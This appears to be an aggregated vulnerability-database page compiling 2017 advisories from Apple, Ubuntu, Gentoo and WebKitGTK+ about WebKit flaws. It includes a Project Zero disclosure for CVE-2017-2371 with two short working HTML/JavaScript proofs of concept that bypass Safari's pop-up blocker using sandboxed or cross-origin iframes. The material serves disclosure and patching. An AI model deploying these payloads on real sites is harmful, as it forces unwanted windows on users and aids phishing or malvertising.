http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2531
[ 93 ] CVE-2017-2536
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2536
[ 94 ] CVE-2017-2539
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2539
[ 95 ] CVE-2017-2544
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2544
[ 96 ] CVE-2017-2547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2547
[ 97 ] CVE-2017-2549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2549
[ 98 ] CVE-2017-6980
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-6980
[ 99 ] CVE-2017-6984
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-6984
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201706-15
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2017 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
--NcNxMnppmhackEL27c23XhPLDAAQ7GQcq--
. Apple WebKit: Bypass pop-up blocker via cross-origin or sandboxed iframe.
CVE-2017-2371
The second argument of window.open is a name for the new window. If there's a frame that has same name, it will try to load the URL in that. If not, it just tries to create a new window and pop-up. But without the user's click event, its attempt will fail.
Here's some snippets.
RefPtr<DOMWindow> DOMWindow::open(const String& urlString, const AtomicString& frameName, const String& windowFeaturesString,
DOMWindow& activeWindow, DOMWindow& firstWindow)
{
...
---------------- (1) -----------------------
if (!firstWindow.allowPopUp()) { <<---- checks there's the user's click event.
// Because FrameTree::find() returns true for empty strings, we must check for empty frame names.
// Otherwise, illegitimate window.open() calls with no name will pass right through the popup blocker.
if (frameName.isEmpty() || !m_frame->tree().find(frameName))
return nullptr;
}
--------------------------------------------
...
RefPtr<Frame> result = createWindow(urlString, frameName, parseWindowFeatures(windowFeaturesString), activeWindow, *firstFrame, *m_frame);
return result ? result->document()->domWindow() : nullptr;
}
RefPtr<Frame> DOMWindow::createWindow(const String& urlString, const AtomicString& frameName, const WindowFeatures& windowFeatures, DOMWindow& activeWindow, Frame& firstFrame, Frame& openerFrame, std::function<void (DOMWindow&)> prepareDialogFunction)
{
...
RefPtr<Frame> newFrame = WebCore::createWindow(*activeFrame, openerFrame, frameRequest, windowFeatures, created);
if (!newFrame)
return nullptr;
...
}
RefPtr<Frame> createWindow(Frame& openerFrame, Frame& lookupFrame, const FrameLoadRequest& request, const WindowFeatures& features, bool& created)
{
ASSERT(!features.dialog || request.frameName().isEmpty());
created = false;
---------------- (2) -----------------------
if (!request.frameName().isEmpty() && request.frameName() != "_blank") {
if (RefPtr<Frame> frame = lookupFrame.loader().findFrameForNavigation(request.frameName(), openerFrame.document())) {
if (request.frameName() != "_self") {
if (Page* page = frame->page())
page->chrome().focus();
}
return frame;
}
}
--------------------------------------------
<<<<<----------- failed to find the frame, creates a new one.
}
The logic of the code (1) depends on the assumption that if |m_frame->tree().find(frameName)| succeeds, |lookupFrame.loader().findFrameForNavigation| at (2) will also succeed. If we could make |m_frame->tree().find(frameName)| succeed but |lookupFrame.loader().findFrameForNavigation| fail, a new window will be created and popped up without the user's click event.
Let's look into |findFrameForNavigation|.
Frame* FrameLoader::findFrameForNavigation(const AtomicString& name, Document* activeDocument)
{
Frame* frame = m_frame.tree().find(name);
// FIXME: Eventually all callers should supply the actual activeDocument so we can call canNavigate with the right document.
if (!activeDocument)
activeDocument = m_frame.document();
if (!activeDocument->canNavigate(frame))
return nullptr;
return frame;
}
bool Document::canNavigate(Frame* targetFrame)
{
...
if (isSandboxed(SandboxNavigation)) { <<<--------------- (1)
if (targetFrame->tree().isDescendantOf(m_frame))
return true;
const char* reason = "The frame attempting navigation is sandboxed, and is therefore disallowed from navigating its ancestors.";
if (isSandboxed(SandboxTopNavigation) && targetFrame == &m_frame->tree().top())
reason = "The frame attempting navigation of the top-level window is sandboxed, but the 'allow-top-navigation' flag is not set.";
printNavigationErrorMessage(targetFrame, url(), reason);
return false;
}
...
if (canAccessAncestor(securityOrigin(), targetFrame)) <<<------------------- (2)
return true;
...
return false;
}
There are two points to make |Document::canNavigate| return false.
(1). Using a sandboxed iframe.
<body>
<iframe name="one"></iframe>
<iframe id="two" sandbox="allow-scripts allow-same-origin allow-popups"></iframe>
<script>
function main() {
two.eval('open("<a href="https://abc.xyz" title="" class="" rel="nofollow">https://abc.xyz</a>", "one");');
}
main()
</script>
</body>
(2). Using a cross-origin iframe.
<body>
<iframe name="one"></iframe>
<script>
function main() {
document.body.appendChild(document.createElement("iframe")).contentDocument.location =
"data:text/html,<script>open('<a href="https://abc.xyz" title="" class="" rel="nofollow">https://abc.xyz</a>', 'one')</scri" + "pt>";
}
main()
</script>
</body>
Tested on Safari 10.0.2 (12602.3.12.0.1).
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Found by: lokihardt
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
APPLE-SA-2017-01-23-1 iOS 10.2.1
iOS 10.2.1 is now available and addresses the following:
Auto Unlock
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Auto Unlock may unlock when Apple Watch is off the user's
wrist
Description: A logic issue was addressed through improved state
management.
CVE-2017-2352: Ashley Fernandez of raptAware Pty Ltd
Contacts
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted contact card may lead to
unexpected application termination
Description: An input validation issue existed in the parsing of
contact cards.
CVE-2017-2368: Vincent Desmurs (vincedes3)
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2017-2370: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed through improved
memory management.
CVE-2017-2360: Ian Beer of Google Project Zero
libarchive
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Unpacking a maliciously crafted archive may lead to arbitrary
code execution
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2016-8687: Agostino Sarubbo of Gentoo
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A prototype access issue was addressed through improved
exception handling.
CVE-2017-2354: Neymar of Tencent's Xuanwu Lab (tencent.com) working
with Trend Micro's Zero Day Initiative
CVE-2017-2362: Ivan Fratric of Google Project Zero
CVE-2017-2373: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory initialization issue was addressed through
improved memory handling.
CVE-2017-2356: Team Pangu and lokihardt at PwnFest 2016
CVE-2017-2366: Kai Kang of Tencent's Xuanwu Lab (tencent.com)
CVE-2017-2369: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: Multiple validation issues existed in the handling of
page loading.
CVE-2017-2363: lokihardt of Google Project Zero
CVE-2017-2364: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: A malicious website can open popups
Description: An issue existed in the handling of blocking popups.
CVE-2017-2371: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A validation issue existed in variable handling.
CVE-2017-2365: lokihardt of Google Project Zero
WiFi
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An activation-locked device can be manipulated to briefly
present the home screen
Description: An issue existed with handling user input that caused a
device to present the home screen even when activation locked.
CVE-2017-2351: Sriram (@Sri_Hxor) of Primefort Pvt. Ltd., Hemanth
Joseph
Additional recognition
WebKit hardening
We would like to acknowledge Ben Gras, Kaveh Razavi, Erik Bosman,
Herbert Bos, and Cristiano Giuffrida of the vusec group at
Vrije Universiteit Amsterdam for their assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About.
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJYgqLhAAoJEIOj74w0bLRGLBMP/2hLYLM6/FsH/npzPbCouZ3a
7WrIax5GAURyvKmeSHYwbZCyDa+U8RoR83xnm25QxVA0SYiqxYQTLavKkdiwL5dL
QJHtbltb3BWF0ctkcN4q9dvA13kapdn7zr1Zp3MyvnqlsIuo5acsl8DwgNapxklP
6NNgLFuUUPDITMRX+CZlndS3ldas9nWBHGUw7FfVQd7+SCj8+u6CBpVm03SPjC4E
9rObbrDg6Ur7RW8sYz5TvfQ+JfL8ZJQgjCNLE99AV5n+y1SzUaW5+WgklmJzwabm
P6VFCFI3qMctmiHDFh5Ab9eFCspL1ppl8gCj2+eqxCdi9cVPdiOxGUJXkfzUvLCq
d68lHHSasRjoVMacMz9ttpR7IAQpM4L9KYgJ/AbwvOFKn5MkxAJYpbU2DDnlg4UY
ZyZ8CqmIfZoEgDFSx4+LcfNeMoB0f0eDClXzCZkLMqyc7ZhRWcDPO7UTXl2l5IN9
1BoOZJ4AB6unI9/JmTz9x1mkfOMatsz3Mlw2aoqfYqhBYH4IMruIoIx9L7VawxY9
IZM1fJhEc1PejgZ48X95suaGm3LHzSqXo9gIcJ42SEevqFaoD96I5S+D1eeBOIe7
yvyQ8APU6W3io9vlfQG7oW+mtHg0uPJY6yLj+79NpvAeVHrFHi1Am+A/4uuEZLjZ
toC5axX5Dn1ZXgiVJb2H
=6bnQ
-----END PGP SIGNATURE-----
.
===========================================================================
Ubuntu Security Notice USN-3200-1
February 16, 2017
webkit2gtk vulnerabilities
===========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.10
- Ubuntu 16.04 LTS
Summary:
Several security issues were fixed in WebKitGTK+.
Software Description:
- webkit2gtk: Web content engine library for GTK+
Details:
A large number of security issues were discovered in the WebKitGTK+ Web and
JavaScript engines. If a user were tricked into viewing a malicious
website, a remote attacker could exploit a variety of issues related to web
browser security, including cross-site scripting attacks, denial of service
attacks, and arbitrary code execution.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 16.10:
libjavascriptcoregtk-4.0-18 2.14.5-0ubuntu0.16.10.1
libwebkit2gtk-4.0-37 2.14.5-0ubuntu0.16.10.1
Ubuntu 16.04 LTS:
libjavascriptcoregtk-4.0-18 2.14.5-0ubuntu0.16.04.1
libwebkit2gtk-4.0-37 2.14.5-0ubuntu0.16.04.1
This update uses a new upstream release, which includes additional bug
fixes. After a standard system update you need to restart any applications
that use WebKitGTK+, such as Epiphany, to make all the necessary changes.
References:
http://www.ubuntu.com/usn/usn-3200-1
CVE-2017-2350, CVE-2017-2354, CVE-2017-2355, CVE-2017-2356,
CVE-2017-2362, CVE-2017-2363, CVE-2017-2364, CVE-2017-2365,
CVE-2017-2366, CVE-2017-2369, CVE-2017-2371, CVE-2017-2373
Package Information:
https://launchpad.net/ubuntu/+source/webkit2gtk/2.14.5-0ubuntu0.16.10.1
https://launchpad.net/ubuntu/+source/webkit2gtk/2.14.5-0ubuntu0.16.04.1
| VAR-201702-0867 | CVE-2017-2353 | Apple macOS of Bluetooth Component vulnerable to arbitrary code execution in privileged context |
CVSS V2: 9.3 CVSS V3: 7.8 Severity: HIGH |
An issue was discovered in certain Apple products. macOS before 10.12.3 is affected. The issue involves the "Bluetooth" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (use-after-free) via a crafted app. Apple macOS is prone to multiple security vulnerabilities. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
APPLE-SA-2017-01-23-2 macOS 10.12.3
macOS 10.12.3 is now available and addresses the following:
apache_mod_php
Available for: macOS Sierra 10.12.2
Impact: Multiple issues in PHP
Description: Multiple issues were addressed by updating to PHP
version 5.6.28.
CVE-2017-2353: Ian Beer of Google Project Zero
Graphics Drivers
Available for: macOS Sierra 10.12.2
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed through improved
input validation.
CVE-2017-2358: Team Pangu and lokihardt at PwnFest 2016
Help Viewer
Available for: macOS Sierra 10.12.2
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A cross-site scripting issue was addressed through
improved URL validation.
CVE-2017-2361: lokihardt of Google Project Zero
IOAudioFamily
Available for: macOS Sierra 10.12.2
Impact: An application may be able to determine kernel memory layout
Description: An uninitialized memory issue was addressed through
improved memory management.
CVE-2017-2357: Team Pangu and lokihardt at PwnFest 2016
Kernel
Available for: macOS Sierra 10.12.2
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2017-2370: Ian Beer of Google Project Zero
Kernel
Available for: macOS Sierra 10.12.2
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed through improved
memory management.
CVE-2017-2360: Ian Beer of Google Project Zero
libarchive
Available for: macOS Sierra 10.12.2
Impact: Unpacking a maliciously crafted archive may lead to arbitrary
code execution
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2016-8687: Agostino Sarubbo of Gentoo
Vim
Available for: macOS Sierra 10.12.2
Impact: Opening a maliciously crafted file may lead to unexpected
application termination or arbitrary code execution
Description: An input validation issue existed in modelines. This was
addressed through improved input validation.
CVE-2016-1248: Florian Larysch
WebKit
Available for: macOS Sierra 10.12.2
Impact: A malicious website can open popups
Description: An issue existed in the handling of blocking popups.
This was addressed through improved input validation.
CVE-2017-2371: lokihardt of Google Project Zero
macOS 10.12.3 may be obtained from the Mac App Store or
Apple's Software Downloads web site:
https://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJYgqLhAAoJEIOj74w0bLRGymIQAMx3h6pTb1SLTCY4H4hUwQf2
tBd4osjrM7eX9kDBJXw9U3S5STs7Qyaiqjc+E3XvGXaeYQhZHurNEy+4HEaS2ctQ
toj0S/meE1bhJ79SKnRuEso0dG2coYAMY4CMWZpF5haEPISunMDrmitIDX6BU8ds
LhIvflT044wXzFsPbUfIMqG1a+1SHGoM3K0J61U6NU7dCSwyYmSGKH/0CTLuezy9
HOiPQJxvWVmfKVBZsYcaBp67AI5948LHdvat3gRq9WpgWpjUFjW/tLSbvZObaIjn
+I3JkVZ9ETuXa+ig42h+CJTz/CozqlC1OpX1YLJLMh4h5+kY9PNwh1kcsv+8jKxo
cbPNatn2uzoigRTWuhCe4Tic6kgri+3c8qR+ZPspNpUyLmentjpbygrkOKVLlNnG
HmV0YIWA+zp4TVgeMnqoEPTHF9kxxhBSPOjgyL2oYwpMHyXb2gmho7Xl9gQirw5T
Nyaoup4A7eT9jR5FBcAvhPPm5I+J44qEKB/D9hvWcQLGf1PR9/zxVd5QxlJZgm9u
loqWBNhPAqD36SPIOsIbkcjAaBKsrEAV01AizkMrhrN1KySscXeZeZ84p4nJusdD
M7bFysYMv7fvNe65V4I2Tc2iujqiPHsXdLRioAWSk7giNRggQtaM8s/C0KYtrJdK
ykSG8JpyNuTNAl1HJtv6
=pBIh
-----END PGP SIGNATURE-----
| VAR-201702-0880 | CVE-2017-2366 | plural Apple Used in products WebKit Vulnerable to arbitrary code execution |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. Safari before 10.0.3 is affected. iCloud before 6.1.1 is affected. iTunes before 12.5.5 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. Apple iTunes, iCloud, Safari and iOS are prone to multiple memory-corruption vulnerabilities.
Attackers can exploit these issues to execute arbitrary code. Failed exploit attempts may result in a denial-of-service condition.
Versions prior to iOS 10.2.1, iCloud 6.1.1, iTunes 12.5.5 and Safari 10.0.3 are vulnerable. in the United States. iTunes for Windows is a set of Windows-based media player applications; Safari is a web browser that comes with the default browser on Mac OS X and iOS operating systems. WebKit is an open source web browser engine developed by the KDE community and is currently used by browsers such as Apple Safari and Google Chrome. A security vulnerability exists in the WebKit component of several Apple products.
Safari 10.0.3 may be obtained from the Mac App Store. ------------------------------------------------------------------------
WebKitGTK+ Security Advisory WSA-2017-0002
------------------------------------------------------------------------
Date reported : February 10, 2017
Advisory ID : WSA-2017-0002
Advisory URL : https://webkitgtk.org/security/WSA-2017-0002.html
CVE identifiers : CVE-2017-2350, CVE-2017-2354, CVE-2017-2355,
CVE-2017-2356, CVE-2017-2362, CVE-2017-2363,
CVE-2017-2364, CVE-2017-2365, CVE-2017-2366,
CVE-2017-2369, CVE-2017-2371, CVE-2017-2373.
Several vulnerabilities were discovered in WebKitGTK+.
Credit to Gareth Heyes of Portswigger Web Security.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: A prototype access issue was
addressed through improved exception handling.
Credit to Neymar of Tencent's Xuanwu Lab (tencent.com) working with
Trend Micro's Zero Day Initiative. Description: Multiple memory corruption
issues were addressed through improved memory handling.
Credit to Team Pangu and lokihardt at PwnFest 2016. Description: A memory initialization issue
was addressed through improved memory handling.
Credit to Team Pangu and lokihardt at PwnFest 2016. Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed through improved memory handling.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: Multiple validation issues existed
in the handling of page loading. This issue was addressed through
improved logic.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: Multiple validation issues existed
in the handling of page loading. This issue was addressed through
improved logic.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: A validation issue existed in
variable handling. This issue was addressed through improved
validation.
Credit to Kai Kang of Tencent's Xuanwu Lab (tencent.com). Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to lokihardt of Google Project Zero.
Impact: A malicious website can open popups. Description: An issue
existed in the handling of blocking popups. This was addressed
through improved input validation.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed through improved memory handling.
We recommend updating to the last stable version of WebKitGTK+. It is
the best way of ensuring that you are running a safe version of
WebKitGTK+. Please check our website for information about the last
stable releases.
Further information about WebKitGTK+ Security Advisories can be found
at: https://webkitgtk.org/security.html
The WebKitGTK+ team,
February 10, 2017
.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201706-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: WebKitGTK+: Multiple vulnerabilities
Date: June 07, 2017
Bugs: #543650, #573656, #577068, #608958, #614876, #619788
ID: 201706-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in WebKitGTK+, the worst of
which allows remote attackers to execute arbitrary code.
Background
==========
WebKitGTK+ is a full-featured port of the WebKit rendering engine.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-libs/webkit-gtk < 2.16.3 >= 2.16.3
Description
===========
Multiple vulnerabilities have been discovered in WebKitGTK+. Please
review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All WebKitGTK+ users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.16.3:4"
References
==========
[ 1 ] CVE-2015-2330
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2330
[ 2 ] CVE-2015-7096
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7096
[ 3 ] CVE-2015-7098
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7098
[ 4 ] CVE-2016-1723
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1723
[ 5 ] CVE-2016-1724
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1724
[ 6 ] CVE-2016-1725
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1725
[ 7 ] CVE-2016-1726
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1726
[ 8 ] CVE-2016-1727
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1727
[ 9 ] CVE-2016-1728
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1728
[ 10 ] CVE-2016-4692
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4692
[ 11 ] CVE-2016-4743
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4743
[ 12 ] CVE-2016-7586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7586
[ 13 ] CVE-2016-7587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7587
[ 14 ] CVE-2016-7589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7589
[ 15 ] CVE-2016-7592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7592
[ 16 ] CVE-2016-7598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7598
[ 17 ] CVE-2016-7599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7599
[ 18 ] CVE-2016-7610
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7610
[ 19 ] CVE-2016-7611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7611
[ 20 ] CVE-2016-7623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7623
[ 21 ] CVE-2016-7632
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7632
[ 22 ] CVE-2016-7635
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7635
[ 23 ] CVE-2016-7639
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7639
[ 24 ] CVE-2016-7640
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7640
[ 25 ] CVE-2016-7641
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7641
[ 26 ] CVE-2016-7642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7642
[ 27 ] CVE-2016-7645
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7645
[ 28 ] CVE-2016-7646
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7646
[ 29 ] CVE-2016-7648
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7648
[ 30 ] CVE-2016-7649
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7649
[ 31 ] CVE-2016-7652
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7652
[ 32 ] CVE-2016-7654
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7654
[ 33 ] CVE-2016-7656
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7656
[ 34 ] CVE-2016-9642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9642
[ 35 ] CVE-2016-9643
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9643
[ 36 ] CVE-2017-2350
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2350
[ 37 ] CVE-2017-2354
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2354
[ 38 ] CVE-2017-2355
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2355
[ 39 ] CVE-2017-2356
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2356
[ 40 ] CVE-2017-2362
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2362
[ 41 ] CVE-2017-2363
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2363
[ 42 ] CVE-2017-2364
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2364
[ 43 ] CVE-2017-2365
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2365
[ 44 ] CVE-2017-2366
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2366
[ 45 ] CVE-2017-2367
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2367
[ 46 ] CVE-2017-2369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2369
[ 47 ] CVE-2017-2371
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2371
[ 48 ] CVE-2017-2373
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2373
[ 49 ] CVE-2017-2376
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2376
[ 50 ] CVE-2017-2377
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2377
[ 51 ] CVE-2017-2386
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2386
[ 52 ] CVE-2017-2392
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2392
[ 53 ] CVE-2017-2394
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2394
[ 54 ] CVE-2017-2395
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2395
[ 55 ] CVE-2017-2396
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2396
[ 56 ] CVE-2017-2405
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2405
[ 57 ] CVE-2017-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2415
[ 58 ] CVE-2017-2419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2419
[ 59 ] CVE-2017-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2433
[ 60 ] CVE-2017-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2442
[ 61 ] CVE-2017-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2445
[ 62 ] CVE-2017-2446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2446
[ 63 ] CVE-2017-2447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2447
[ 64 ] CVE-2017-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2454
[ 65 ] CVE-2017-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2455
[ 66 ] CVE-2017-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2457
[ 67 ] CVE-2017-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2459
[ 68 ] CVE-2017-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2460
[ 69 ] CVE-2017-2464
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2464
[ 70 ] CVE-2017-2465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2465
[ 71 ] CVE-2017-2466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2466
[ 72 ] CVE-2017-2468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2468
[ 73 ] CVE-2017-2469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2469
[ 74 ] CVE-2017-2470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2470
[ 75 ] CVE-2017-2471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2471
[ 76 ] CVE-2017-2475
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2475
[ 77 ] CVE-2017-2476
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2476
[ 78 ] CVE-2017-2481
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2481
[ 79 ] CVE-2017-2496
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2496
[ 80 ] CVE-2017-2504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2504
[ 81 ] CVE-2017-2505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2505
[ 82 ] CVE-2017-2506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2506
[ 83 ] CVE-2017-2508
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2508
